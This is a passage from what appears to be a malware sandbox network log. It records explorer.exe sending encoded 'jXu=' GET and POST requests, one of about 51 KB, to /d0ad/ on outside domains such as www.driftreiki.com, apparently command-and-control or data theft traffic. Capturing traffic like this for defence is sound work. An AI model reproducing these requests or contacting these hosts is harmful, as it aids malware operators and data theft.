Oct 26, 2022 13:17:53.694031954 CEST	1109	OUT	Data Raw: 74 56 6f 7e 59 45 32 44 4f 6c 4b 57 64 59 36 61 76 7a 61 68 50 76 6f 59 68 4f 4e 28 59 39 56 59 5a 4b 41 5a 32 34 4a 54 75 28 45 64 36 43 61 4b 61 66 41 72 41 7e 5a 5a 4f 7a 4b 6e 31 6b 6b 74 51 31 59 59 54 70 42 59 50 5a 71 70 64 6f 73 44 6c 59 Data Ascii: tVo~YE2DOlKWdY6avzahPvoYhON(Y9VYZKAZ24JTu(Ed6CaKafArA~ZZOzKn1kktQ1YYTpBYPZqpdosDlYf5IUE4jYVjMsu2UgPtdo9Fn1ASfGLaZhTQ2GnkdyonRaqU9KFnJQs60drNnD2PELJuJIaWH8uPxnCDu0DXtTNYqbmBhOBlXmu0cHWdHPqskguaNHHX271B0AQOAoKugPmCqjZAikzRgZN(FpkxZNqEnKP9hoyjn(x
Oct 26, 2022 13:17:53.694201946 CEST	1117	OUT	Data Raw: 36 56 2d 5a 72 5a 7a 4f 55 57 70 66 2d 4d 45 4a 30 35 44 49 76 7e 30 6b 4f 48 66 47 78 67 35 39 70 45 4a 44 52 78 69 70 61 49 76 50 46 32 52 41 76 7e 38 67 65 33 73 6f 6f 31 4f 63 57 51 33 4e 52 71 62 78 4d 52 67 75 58 62 6e 76 61 58 31 32 72 7e Data Ascii: 6V-ZrZzOUWpf-MEJ05DIv~0kOHfGxg59pEJDRxipaIvPF2RAv~8ge3soo1OcWQ3NRqbxMRguXbnvaX12r~RJg2scYp-uN(68HT8PFCOyN91FaKH4P1808DhUCy5uqiXYl329iE6gHhX5tjg8FDTrdJEnFRAbrMoyhcEVeYV9g6pexSjc2bKVJinjurqDlkRlbYk14QKvC0X0qehfklu5uDpuADF2v6BmJ8PaXNKnljYZ0rv6Bus
Oct 26, 2022 13:17:53.816736937 CEST	1121	OUT	Data Raw: 6b 7e 51 6e 79 48 77 47 64 71 45 67 59 4a 37 73 6d 39 4c 39 55 37 50 67 6b 57 67 4d 75 6e 38 6a 56 79 51 46 4d 36 7a 48 6b 52 56 55 62 4e 63 7e 78 6d 67 67 37 71 75 46 53 75 6b 38 4b 38 51 6f 4f 6b 42 4b 6b 59 54 47 32 7e 65 28 65 57 68 67 58 4a Data Ascii: k~QnyHwGdqEgYJ7sm9L9U7PgkWgMun8jVyQFM6zHkRVUbNc~xmgg7quFSuk8K8QoOkBKkYTG2~e(eWhgXJikkLWOd8iqQuYda7QkqJiRX9bpgL50kq_bUe4iu~xkJz1P2yZBD6aLxy8wTfT89vpwynYiWLpnR7Ewix2fJjd03c8zNI7pXXeGv(blUBZH7v5GN3AkToyzS0sNiKB9NuBmT6SkxMByONg3x5BaFsjqGKKRoj8oxfI
Oct 26, 2022 13:17:53.816811085 CEST	1127	OUT	Data Raw: 74 49 4d 58 4c 7a 62 57 65 33 49 6c 4e 47 33 44 37 34 42 65 5a 57 67 28 70 69 44 77 5a 6a 53 63 78 37 45 28 69 41 77 54 41 46 74 30 71 53 62 30 41 57 71 56 38 73 77 44 33 4e 57 31 55 46 67 58 31 68 34 50 36 77 68 65 4f 36 49 45 56 4c 67 72 4e 4d Data Ascii: tIMXLzbWe3IlNG3D74BeZWg(piDwZjScx7E(iAwTAFt0qSb0AWqV8swD3NW1UFgX1h4P6wheO6IEVLgrNM-iF7AOSoQ7Ypg3O470NHVeEgJtDIvyHT1uxStbGAQnnN7ddPXkDEhRx9xjIg2bUhapLmMsEuXlE(Y7uZEZOXooOqL8B5pV_n_rpmHJAZS8xxx0ml-8GzbiFwkmJrvfxVFHnPt2olY62ZUpHhwdMZuHAfGsVFpY0Bl
Oct 26, 2022 13:17:53.817210913 CEST	1131	OUT	Data Raw: 41 76 36 34 6a 30 41 50 4c 4f 36 48 58 64 33 59 43 71 71 64 51 6e 37 67 76 35 6a 6d 67 45 76 49 2d 43 33 62 4a 75 62 4b 42 5a 72 52 39 62 44 4a 57 72 66 74 61 76 56 79 5f 6d 50 6c 4d 45 52 30 75 58 50 78 31 37 39 46 54 36 32 74 33 4a 61 42 37 7e Data Ascii: Av64j0APLO6HXd3YCqqdQn7gv5jmgEvI-C3bJubKBZrR9bDJWrftavVy_mPlMER0uXPx179FT62t3JaB7~VMwnEwwCUr6UnKTe0Q4pjMtTdViSnDhcaBQ3xv99tlsuM0plzu-UgFl9yz_p5JnrEShK7NYVeNn8S(v4WYn9RqGC-CxRiqAz6nWFrNR(CjB9r~RsuMtMcKRNyRhwedSN6pcvvGIytES(NPadrB0AYC94iPV7NroYP
Oct 26, 2022 13:17:53.943002939 CEST	1133	IN	HTTP/1.1 404 Not Found Content-Type: text/html Transfer-Encoding: chunked Connection: close Date: Wed, 26 Oct 2022 11:17:53 GMT Server: Apache Content-Encoding: gzip Data Raw: 31 38 39 0d 0a 1f 8b 08 00 00 00 00 00 00 03 7d 51 4b 4f e3 30 10 be f7 57 cc 7a 0f 9c 1c 37 94 43 9b 26 1c b6 ad b4 48 85 45 28 88 e5 68 62 b7 b1 e4 78 82 33 21 0d bf 1e 27 e5 b1 20 b4 27 8f ed ef 31 f3 4d fa 63 fd 67 95 df 5f 6f a0 a4 ca c2 f5 ed af ed c5 0a 18 17 e2 6e b6 12 62 9d af e1 ef ef fc 72 0b 71 34 85 dc 4b d7 18 32 e8 a4 15 62 73 c5 26 ac 24 aa 13 21 ba ae 8b ba 59 84 7e 2f f2 1b 71 18 b4 e2 81 fc 5a 72 fa 87 19 29 52 ec 7c 92 8e 86 56 ba 7d c6 b4 63 70 a8 6c f2 e9 e6 9a ec 1b f9 78 b1 58 1c 55 83 06 a4 a5 96 2a 9c 90 92 21 ab 87 0a 36 de a3 87 b3 e9 19 70 b8 42 82 1d b6 4e 0d 10 f1 8e 49 2b 4d 12 0a 74 a4 1d 65 8c f4 81 c4 d0 ce 12 8a 52 fa 46 53 d6 d2 8e cf 59 08 85 6a ae 1f 5b f3 94 b1 d5 11 ce f3 be d6 83 37 7c 51 71 c8 0b 59 94 fa 33 6b 7c e2 83 95 47 3b b6 2c 5e 7b 4e 1f 50 f5 d0 50 6f 75 c6 76 01 c0 77 b2 32 b6 4f a4 37 d2 2e 8f 16 65 fc 86 28 d0 a2 4f 7e 4e e5 ec 74 5e 2c 47 7c 63 9e 75 12 16 a3 ab 23 fa 3f a3 97 f1 d8 71 fd a6 f6 c1 9f 46 f3 77 fe 3d b6 1e 1e 3c 76 8d f6 50 48 77 12 d2 33 4e 01 95 1a 14 16 6d 15 e2 0a b1 79 af 9b 1a 9d 32 6e 0f 84 e3 ef ed cd 16 7a 6c 81 42 38 0a 8c 8b c6 c0 eb 60 9a 8a 61 ce b0 ef 31 e1 f3 c9 0b 6c 60 6d 75 72 02 00 00 0d 0a 30 0d 0a 0d 0a Data Ascii: 189}QKO0Wz7C&HE(hbx3!' '1Mcg_onbrq4K2bs&$!Y~/qZr)R\|V}cplxXU*!6pBNI+MteRFSYj[7\|QqY3k\|G;,^{NPPouvw2O7.e(O~Nt^,G\|cu#?qFw=<vPHw3Nmy2nzlB8`a1l`mur0

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
45	192.168.11.20	49889	74.208.236.144	80	C:\Windows\explorer.exe

Timestamp	kBytes transferred	Direction	Data
Oct 26, 2022 13:17:55.706895113 CEST	1133	OUT	GET /d0ad/?jXu=pSoFcc1sljf5pE8BAUAKgRGInj4t6J/8ED+D7ZUBpkkz/bcIOpxSRb8xzFWwpHvVFx48hu31rpRymwEIqHbvimFaG2ZjSEosQg==&-ZeDxH=1bfDxheXLTWtxB0 HTTP/1.1 Host: www.migrationtask.com Connection: close Data Raw: 00 00 00 00 00 00 00 Data Ascii:
Oct 26, 2022 13:17:55.831473112 CEST	1134	IN	HTTP/1.1 404 Not Found Content-Type: text/html Content-Length: 626 Connection: close Date: Wed, 26 Oct 2022 11:17:55 GMT Server: Apache Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 58 48 54 4d 4c 20 31 2e 30 20 54 72 61 6e 73 69 74 69 6f 6e 61 6c 2f 2f 45 4e 22 0a 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 78 68 74 6d 6c 31 2f 44 54 44 2f 78 68 74 6d 6c 31 2d 74 72 61 6e 73 69 74 69 6f 6e 61 6c 2e 64 74 64 22 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 78 6d 6c 3a 6c 61 6e 67 3d 22 65 6e 22 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 68 74 6d 6c 22 3e 0a 20 3c 68 65 61 64 3e 0a 20 20 3c 74 69 74 6c 65 3e 0a 20 20 20 45 72 72 6f 72 20 34 30 34 20 2d 20 4e 6f 74 20 66 6f 75 6e 64 0a 20 20 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 6d 65 74 61 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 3e 0a 20 20 3c 6d 65 74 61 20 63 6f 6e 74 65 6e 74 3d 22 6e 6f 2d 63 61 63 68 65 22 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 61 63 68 65 2d 63 6f 6e 74 72 6f 6c 22 3e 0a 20 3c 2f 68 65 61 64 3e 0a 20 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 61 72 69 61 6c 3b 22 3e 0a 20 20 3c 68 31 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 23 30 61 33 32 38 63 3b 66 6f 6e 74 2d 73 69 7a 65 3a 31 2e 30 65 6d 3b 22 3e 0a 20 20 20 45 72 72 6f 72 20 34 30 34 20 2d 20 4e 6f 74 20 66 6f 75 6e 64 0a 20 20 3c 2f 68 31 3e 0a 20 20 3c 70 20 73 74 79 6c 65 3d 22 66 6f 6e 74 2d 73 69 7a 65 3a 30 2e 38 65 6d 3b 22 3e 0a 20 20 20 59 6f 75 72 20 62 72 6f 77 73 65 72 20 63 61 6e 27 74 20 66 69 6e 64 20 74 68 65 20 64 6f 63 75 6d 65 6e 74 20 63 6f 72 72 65 73 70 6f 6e 64 69 6e 67 20 74 6f 20 74 68 65 20 55 52 4c 20 79 6f 75 20 74 79 70 65 64 20 69 6e 2e 0a 20 20 3c 2f 70 3e 0a 20 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN""http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html lang="en" xml:lang="en" xmlns="http://www.w3.org/1999/xhtml"> <head> <title> Error 404 - Not found </title> <meta content="text/html; charset=utf-8" http-equiv="Content-Type"> <meta content="no-cache" http-equiv="cache-control"> </head> <body style="font-family:arial;"> <h1 style="color:#0a328c;font-size:1.0em;"> Error 404 - Not found </h1> <p style="font-size:0.8em;"> Your browser can't find the document corresponding to the URL you typed in. </p> </body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
46	192.168.11.20	49890	207.60.131.46	80	C:\Windows\explorer.exe

Timestamp	kBytes transferred	Direction	Data
Oct 26, 2022 13:18:01.347455025 CEST	1135	OUT	POST /d0ad/ HTTP/1.1 Host: www.driftreiki.com Connection: close Content-Length: 185 Cache-Control: no-cache Origin: http://www.driftreiki.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko Content-Type: application/x-www-form-urlencoded Accept: / Referer: http://www.driftreiki.com/d0ad/ Accept-Language: en-US Accept-Encoding: gzip, deflate Data Raw: 6a 58 75 3d 50 65 35 49 4c 53 4e 33 48 6f 76 6f 34 59 71 61 49 75 34 4a 4f 58 75 6d 4d 6b 53 76 67 6e 31 59 61 63 5a 75 78 76 4b 36 56 54 6d 56 34 4e 4e 72 6d 79 73 58 73 31 79 4f 32 76 48 54 6d 45 4e 6c 30 74 34 73 35 2d 66 4e 52 35 7e 31 6e 63 53 37 28 50 61 5a 75 30 54 73 63 62 6f 43 53 63 72 32 42 33 6b 30 45 5f 4a 65 72 57 5a 53 54 34 72 45 53 71 55 52 75 48 6d 51 50 79 7e 6f 71 49 28 6d 62 6e 49 74 6e 4e 7a 72 73 70 43 65 54 74 4e 4e 64 2d 49 43 75 4d 37 50 43 44 55 72 7a 35 6e 69 71 52 53 50 6d 44 41 73 4a 36 28 5f 31 65 6b 69 44 51 29 2e 00 00 00 00 00 00 00 00 Data Ascii: jXu=Pe5ILSN3Hovo4YqaIu4JOXumMkSvgn1YacZuxvK6VTmV4NNrmysXs1yO2vHTmENl0t4s5-fNR5~1ncS7(PaZu0TscboCScr2B3k0E_JerWZST4rESqURuHmQPy~oqI(mbnItnNzrspCeTtNNd-ICuM7PCDUrz5niqRSPmDAsJ6(_1ekiDQ).
Oct 26, 2022 13:18:01.527409077 CEST	1135	IN	HTTP/1.1 403 Forbidden Transfer-Encoding: chunked Server: Microsoft-HTTPAPI/2.0 Date: Wed, 26 Oct 2022 11:18:01 GMT Connection: close Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
47	192.168.11.20	49891	207.60.131.46	80	C:\Windows\explorer.exe

Timestamp	kBytes transferred	Direction	Data
Oct 26, 2022 13:18:03.561152935 CEST	1137	OUT	POST /d0ad/ HTTP/1.1 Host: www.driftreiki.com Connection: close Content-Length: 525 Cache-Control: no-cache Origin: http://www.driftreiki.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko Content-Type: application/x-www-form-urlencoded Accept: / Referer: http://www.driftreiki.com/d0ad/ Accept-Language: en-US Accept-Encoding: gzip, deflate Data Raw: 6a 58 75 3d 50 65 35 49 4c 53 4e 33 48 6f 76 6f 34 34 61 61 4c 50 34 4a 47 58 75 6c 44 45 53 76 37 58 31 63 61 63 64 75 78 74 6e 6e 56 67 43 56 34 6f 78 72 6e 78 30 58 74 31 79 4f 69 5f 48 57 72 6b 4e 75 30 74 6b 53 35 2d 54 4e 52 34 61 31 6e 76 61 37 76 76 61 65 67 55 54 76 62 62 6f 44 44 4d 72 77 42 33 6f 6f 45 2d 74 65 7e 32 39 53 53 39 33 45 44 4f 41 53 28 58 6e 56 48 53 7e 6e 39 59 28 6f 62 6e 4d 50 6e 4d 37 52 73 37 65 65 54 4e 74 4e 63 2d 49 42 6b 38 37 49 4d 54 56 4b 67 36 4b 50 67 52 69 57 77 51 49 49 57 62 43 6a 28 74 42 70 64 56 37 37 42 41 39 6a 52 71 69 30 48 70 31 42 43 74 61 6e 42 44 76 7a 31 2d 6f 49 6d 33 61 69 32 77 76 31 34 6c 65 62 38 31 45 55 66 35 6b 4e 4a 37 4f 63 6f 53 39 48 51 76 7a 48 35 35 41 4b 4f 4e 46 7a 67 33 56 65 79 38 6f 79 4f 52 7a 65 72 6d 50 63 44 46 68 4b 48 47 41 43 7a 2d 58 43 30 55 75 4b 72 63 65 30 51 45 28 6f 44 73 71 37 6b 7a 6c 6b 33 6c 39 46 6b 34 77 4c 56 65 31 64 65 79 79 32 38 48 6d 78 4e 71 37 59 76 4a 31 44 34 49 6a 4e 52 74 34 4e 54 30 79 78 37 31 63 72 55 45 49 66 54 36 7e 73 53 35 65 31 72 61 47 6d 6e 73 65 41 36 77 4c 5a 37 71 66 42 28 62 63 59 43 32 49 73 56 4e 78 6c 72 6e 59 59 38 78 63 53 4f 59 7e 6a 6f 76 62 78 34 36 49 36 37 72 6e 43 73 48 63 70 32 74 4b 37 72 70 6f 43 53 6a 57 79 4a 5f 36 6c 53 46 37 74 76 44 38 47 70 6f 50 56 6a 47 48 45 74 42 61 6b 30 53 48 35 47 6b 43 58 43 67 4f 51 47 54 64 32 52 33 7e 31 79 63 59 39 78 2d 63 30 6c 41 48 54 4a 54 69 54 49 4e 55 4e 70 65 71 74 67 34 47 41 5a 4a 71 54 58 61 31 62 38 51 65 31 77 4c 30 62 78 31 39 41 71 38 61 6e 4a 56 7a 57 74 34 51 2e 00 00 00 00 00 00 00 00 Data Ascii: jXu=Pe5ILSN3Hovo44aaLP4JGXulDESv7X1cacduxtnnVgCV4oxrnx0Xt1yOi_HWrkNu0tkS5-TNR4a1nva7vvaegUTvbboDDMrwB3ooE-te~29SS93EDOAS(XnVHS~n9Y(obnMPnM7Rs7eeTNtNc-IBk87IMTVKg6KPgRiWwQIIWbCj(tBpdV77BA9jRqi0Hp1BCtanBDvz1-oIm3ai2wv14leb81EUf5kNJ7OcoS9HQvzH55AKONFzg3Vey8oyORzermPcDFhKHGACz-XC0UuKrce0QE(oDsq7kzlk3l9Fk4wLVe1deyy28HmxNq7YvJ1D4IjNRt4NT0yx71crUEIfT6~sS5e1raGmnseA6wLZ7qfB(bcYC2IsVNxlrnYY8xcSOY~jovbx46I67rnCsHcp2tK7rpoCSjWyJ_6lSF7tvD8GpoPVjGHEtBak0SH5GkCXCgOQGTd2R3~1ycY9x-c0lAHTJTiTINUNpeqtg4GAZJqTXa1b8Qe1wL0bx19Aq8anJVzWt4Q.
Oct 26, 2022 13:18:03.741077900 CEST	1137	IN	HTTP/1.1 403 Forbidden Transfer-Encoding: chunked Server: Microsoft-HTTPAPI/2.0 Date: Wed, 26 Oct 2022 11:18:03 GMT Connection: close Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
48	192.168.11.20	49892	207.60.131.46	80	C:\Windows\explorer.exe

Timestamp	kBytes transferred	Direction	Data
Oct 26, 2022 13:18:05.768318892 CEST	1150	OUT	POST /d0ad/ HTTP/1.1 Host: www.driftreiki.com Connection: close Content-Length: 51813 Cache-Control: no-cache Origin: http://www.driftreiki.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko Content-Type: application/x-www-form-urlencoded Accept: / Referer: http://www.driftreiki.com/d0ad/ Accept-Language: en-US Accept-Encoding: gzip, deflate Data Raw: 6a 58 75 3d 50 65 35 49 4c 53 4e 33 48 6f 76 6f 34 34 61 61 4c 50 34 4a 47 58 75 6c 44 45 53 76 37 58 31 63 61 63 64 75 78 74 6e 6e 56 67 4b 56 34 2d 46 72 6c 51 30 58 28 46 79 4f 39 50 48 58 72 6b 4e 7a 30 74 38 65 35 2d 75 32 52 37 79 31 6e 2d 4b 37 76 36 47 65 77 45 54 75 56 37 6f 42 53 63 72 6b 42 33 6b 47 45 2d 4a 4f 72 53 39 53 54 36 7a 45 53 4a 38 52 6a 58 6d 51 48 53 7e 64 75 49 7e 43 62 6e 41 45 6e 4d 33 52 73 35 61 65 53 5f 6c 4e 61 74 67 42 70 4d 37 4c 4b 6a 56 42 33 71 4b 6d 67 52 6d 6f 77 51 49 79 57 5a 75 6a 28 75 4a 70 63 57 44 38 42 67 39 6a 63 4b 69 33 4b 4d 74 4e 43 73 32 42 42 44 62 7a 31 38 6f 49 6e 58 61 69 39 31 62 79 73 56 65 5a 78 56 45 44 62 35 6f 46 4a 37 61 69 6f 54 4a 48 51 65 54 48 6a 71 59 4b 4c 73 46 7a 6a 58 56 63 76 73 6f 62 48 78 7a 61 72 6d 66 71 44 47 34 33 48 42 34 43 79 62 6a 43 69 41 36 46 76 38 66 5f 63 6b 7e 67 48 73 57 5f 6b 7a 31 4f 33 6c 39 56 6b 36 63 4c 55 75 6c 64 52 51 57 78 73 6e 6d 79 47 4b 37 4e 35 35 35 4e 34 49 28 46 52 75 35 49 54 79 53 78 70 46 63 72 45 7a 38 59 49 36 28 6b 65 5a 66 71 6c 36 47 78 6e 73 69 71 36 78 50 6a 37 37 7a 42 28 72 4d 59 56 32 49 76 52 74 78 66 68 48 59 65 34 78 63 53 4f 59 79 64 6f 76 66 78 34 72 77 36 70 73 6a 43 39 32 63 70 30 74 4b 39 72 70 6f 70 53 6a 62 43 4a 5f 6a 76 53 46 72 58 76 42 51 47 70 35 66 56 6b 45 76 48 6d 52 61 62 77 53 48 49 49 45 50 42 43 67 43 49 47 54 4e 41 52 41 4f 31 38 39 6b 39 37 65 63 33 7a 51 48 71 42 7a 6a 53 4d 49 4d 5a 70 65 6d 58 67 34 62 4e 5a 4a 43 54 62 5f 77 68 67 52 75 72 6d 36 30 78 34 6c 64 52 70 36 53 4b 62 6b 6e 2d 76 75 51 49 72 79 51 54 46 4d 4c 71 6c 42 57 5f 51 31 79 48 38 53 77 79 5a 30 49 76 43 79 61 61 74 6a 57 53 76 63 4c 58 73 51 79 74 53 45 54 6d 4a 39 66 6c 4e 69 6e 54 31 59 44 2d 6b 6c 65 6d 4a 68 4b 66 61 6d 78 35 53 77 31 47 42 67 6b 66 36 45 37 78 70 59 73 58 6a 63 50 59 44 53 6d 53 30 51 71 59 4c 39 33 49 7e 31 75 69 4c 79 31 5f 32 48 67 6a 59 72 71 78 4c 36 63 56 42 4d 75 41 50 6f 6a 69 61 55 42 5f 52 77 6c 72 6f 49 56 49 47 49 31 34 54 54 4b 58 49 4e 43 6d 42 6e 6a 34 67 6d 55 32 67 67 71 6b 5a 35 69 7a 57 72 57 57 7e 76 49 76 70 63 34 71 63 62 43 54 65 76 32 44 62 67 54 50 68 74 49 54 6d 55 50 6d 4c 38 57 77 38 42 5a 4b 47 37 37 54 56 37 77 55 67 52 78 71 6f 4d 6b 4f 51 4f 4f 67 44 6f 76 47 6a 5f 4b 73 65 4a 61 4b 47 67 41 6b 6a 74 78 51 4a 72 62 4b 63 57 42 67 39 77 6d 7a 64 41 32 73 5a 42 62 33 39 45 57 73 4b 51 28 37 50 32 4c 38 55 63 41 74 46 4f 6e 49 4e 76 32 48 58 6f 35 32 53 45 67 6f 6e 6d 54 6e 6e 66 77 64 65 62 6c 77 58 61 62 70 4f 6d 75 73 68 6e 4c 35 64 31 59 46 45 34 6a 6d 68 6e 62 64 71 36 4c 2d 51 5a 57 59 66 38 63 42 4e 4e 50 46 77 57 31 44 58 6e 57 39 6b 64 7a 37 51 68 35 43 54 50 64 69 42 31 55 39 4d 4f 71 37 30 39 4c 39 6f 77 71 43 30 6a 31 4d 56 53 72 62 56 47 4f 51 71 6b 36 35 53 56 51 44 38 54 78 36 42 32 58 69 32 69 34 5f 42 2d 49 38 53 4d 79 6e 56 6c 47 6a 57 69 37 5f 52 59 6a 6f 63 32 6e 79 4a 77 34 63 6e 67 48 68 32 6b 33 49 32 43 33 30 63 6e 30 71 4a 5a 4d 5f 30 61 39 77 6d 36 62 6b 79 52 77 61 6a 6e 4c 64 58 4f 44 54 31 6d 54 66 54 67 75 4c 65 6c 28 4b 6e 2d 36 44 38 4c 41 4e 67 64 41 54 65 72 28 49 34 30 63 78 35 76 64 55 42 61 6e 43 30 2d 6d 72 31 73 36 5a 35 68 4c 35 6e 4c 4a 57 46 31 57 34 70 7a 38 44 75 6b 53 4e 6a 38 7e 56 4c 39 4b 58 72 4a 55 31 67 75 38 49 4b 6c 51 76 72 45 78 74 43 6c 39 51 66 64 49 42 48 51 32 37 45 54 42 57 59 38 38 52 6b 49 69 46 53 34 52 57 67 39 52 44 69 39 74 78 6e 65 55 4c 7e 43 79 68 67 71 62 36 6a 62 74 31 33 44 65 46 4e 49 64 30 32 4a 6d 77 63 5f 52 47 6b 5f 36 66 36 6e 57 5a 4e 77 54 57 65 51 53 48 56 63 76 39 52 51 66 2d 55 6c 7a 34 32 4d 53 6f 66 41 71 68 54 62 61 35 55 30 65 41 66 48 32 79 32 5f 6b 32 68 6c 74 76 76 6f 68 30 42 46 43 35 37 6b 49 4f 67 42 35 39 70 72 4f 49 74 31 48 70 76 4a 76 71 74 36 6c 61 58 4a 42 56 59 44 69 44 35 76 58 5f 31 46 75 2d 76 6a 43 33 63 66 42 38 50 38 56 4e 4d 5f 5a 74 6c 6d 64 49 74 6d 43 71 62 4e 4a 72 58 77 6a 67 58 4e 39 77 36 64 69 6a 57 70 71 5f 4d 55 6f 71 70 6a 33 63 35 53 36 79 32 2d 30 50 30 61 39 33 69 73 67 44 55 74 6b 53 56 73 30 42 52 34 4f 43 61 6e 73 30 50 4a 38 Data Ascii: jXu=Pe5ILSN3Hovo44aaLP4JGXulDESv7X1cacduxtnnVgKV4-FrlQ0X(FyO9PHXrkNz0t8e5-u2R7y1n-K7v6GewETuV7oBScrkB3kGE-JOrS9ST6zESJ8RjXmQHS~duI~CbnAEnM3Rs5aeS_lNatgBpM7LKjVB3qKmgRmowQIyWZuj(uJpcWD8Bg9jcKi3KMtNCs2BBDbz18oInXai91bysVeZxVEDb5oFJ7aioTJHQeTHjqYKLsFzjXVcvsobHxzarmfqDG43HB4CybjCiA6Fv8f_ck~gHsW_kz1O3l9Vk6cLUuldRQWxsnmyGK7N555N4I(FRu5ITySxpFcrEz8YI6(keZfql6Gxnsiq6xPj77zB(rMYV2IvRtxfhHYe4xcSOYydovfx4rw6psjC92cp0tK9rpopSjbCJ_jvSFrXvBQGp5fVkEvHmRabwSHIIEPBCgCIGTNARAO189k97ec3zQHqBzjSMIMZpemXg4bNZJCTb_whgRurm60x4ldRp6SKbkn-vuQIryQTFMLqlBW_Q1yH8SwyZ0IvCyaatjWSvcLXsQytSETmJ9flNinT1YD-klemJhKfamx5Sw1GBgkf6E7xpYsXjcPYDSmS0QqYL93I~1uiLy1_2HgjYrqxL6cVBMuAPojiaUB_RwlroIVIGI14TTKXINCmBnj4gmU2ggqkZ5izWrWW~vIvpc4qcbCTev2DbgTPhtITmUPmL8Ww8BZKG77TV7wUgRxqoMkOQOOgDovGj_KseJaKGgAkjtxQJrbKcWBg9wmzdA2sZBb39EWsKQ(7P2L8UcAtFOnINv2HXo52SEgonmTnnfwdeblwXabpOmushnL5d1YFE4jmhnbdq6L-QZWYf8cBNNPFwW1DXnW9kdz7Qh5CTPdiB1U9MOq709L9owqC0j1MVSrbVGOQqk65SVQD8Tx6B2Xi2i4_B-I8SMynVlGjWi7_RYjoc2nyJw4cngHh2k3I2C30cn0qJZM_0a9wm6bkyRwajnLdXODT1mTfTguLel(Kn-6D8LANgdATer(I40cx5vdUBanC0-mr1s6Z5hL5nLJWF1W4pz8DukSNj8~VL9KXrJU1gu8IKlQvrExtCl9QfdIBHQ27ETBWY88RkIiFS4RWg9RDi9txneUL~Cyhgqb6jbt13DeFNId02Jmwc_RGk_6f6nWZNwTWeQSHVcv9RQf-Ulz42MSofAqhTba5U0eAfH2y2_k2hltvvoh0BFC57kIOgB59prOIt1HpvJvqt6laXJBVYDiD5vX_1Fu-vjC3cfB8P8VNM_ZtlmdItmCqbNJrXwjgXN9w6dijWpq_MUoqpj3c5S6y2-0P0a93isgDUtkSVs0BR4OCans0PJ8EabXZWjKwlel2YXVMZGpC28RVNQLrtRhcqmeludj1YeJ2voON7UpKUgJMvSYPA8lj(sAsRSw9yOwkFEQX8znRu3l83u(BWFCjkJ8RVaIce8RNVsHvjRSocVHP97hCj_dBDx2XBsBYF6LC2S1YMW3gBtX_eD6gcJqkCs4XDuCuhdykJoK9SMgQuoNK26zGjQp_DaFG7xiI(VlnCERgzSeFQozzinYnMtMBVEEY~YFkJCJgbJ4Q2BGI3D56cKSFNoQhhIVew1o37Urw0eXzK8u0yo2hBft3Ut~x1U2ml41hJ5Cb9Th6ygGYutCUYGGjpnAfv18zR_o7MCFbrTgT(VVPIpkQrpwfJJ7EesaGxKCBsexSVCmT3CqhlK96aLoGE5Vx2TFvPxGWjg5mwI5VWCSZ(-Q3EfgF~3Ql0aQvoRzSdsdnH96jYsJSOAPf(qi6n-1kyZv8VS(7lJX9c2M4iJsM5gc3~a3Lg7E7Anw2HfSYPZL4wot5ywvGs4YJf9H5GxKa879wui3sdfOPckjBdvRUjEI4iR4nWrHUomtrvNlrZtMpOO29d8UqpPtt~HI_yV0My2ofTRinQ0zAVXKWpxVt1JrgdWBkYpmJJRvXScAxJ8530WeFGjIV2CfoYEppwctLOk5pr9PpQwlzYZJ6TmJReG5K0It1lbCdzG1bSk71SWsVFb~zJhGv9gjtjg(4LJIF(LCDTgrB0wfoNIfU3pntGPZUApzIBqmyJI~QILYQBByOUmtrB4qmmnFCkfpIzfLk3A1-cC2GAPYXHoUSvpB-LHJkFLM7DHhfJFYaQnyQSv91iqCfxDURmyPujpnGAgCfEe8u3PZUMVupyHxGRTww(fAzrK7qEEBQVbKxs1LbxrIVtTwC2nEKq8vP9_gjpiuA~k68dN~X0anlSNz4YgaTIGw1JUuahGTdmEEwxTF_NDYctgihWim_0z(KULtgugHQVPHZoc0M(UZmXLlJORNxa3oL28vUR1JwBBx9hVfap6m16wCIIaNTZg8cJi(gduPP57CQ5e1tqmzlLm9DN1FsQLAjWEYxgzm4yyrXx0y9zP8ED04ayotOV-GCXCLltb1p2humK-2-zY5SegWJtZeKIE3sgRuYqHvwJzCBx6OYeKcM0GHRyDb_hNRtaqnaGN~FPPLZXa73RLmuQD4H90vZYli_L5zN2ow9nRwSJ_h8(SCCHdaaJv2sxgJRhlmJhQ60xDV-6qrrQAnukD41ibeEPqIDQq~WnVM09b~E47vzHZEYlVRbGA384S(D(WvmOe2jkLEpyANB623G~iB-wNr6hK72y1mMbCh9~VNyhyT50vgy491_P7AJ01pZa98NHnD9mNphdecW33lHRf0JxJFhCaTtxN0cAN(cupZKGoFdyoef3PeQAXVLfEc0ONOq1aYL2swgVHGFea9cO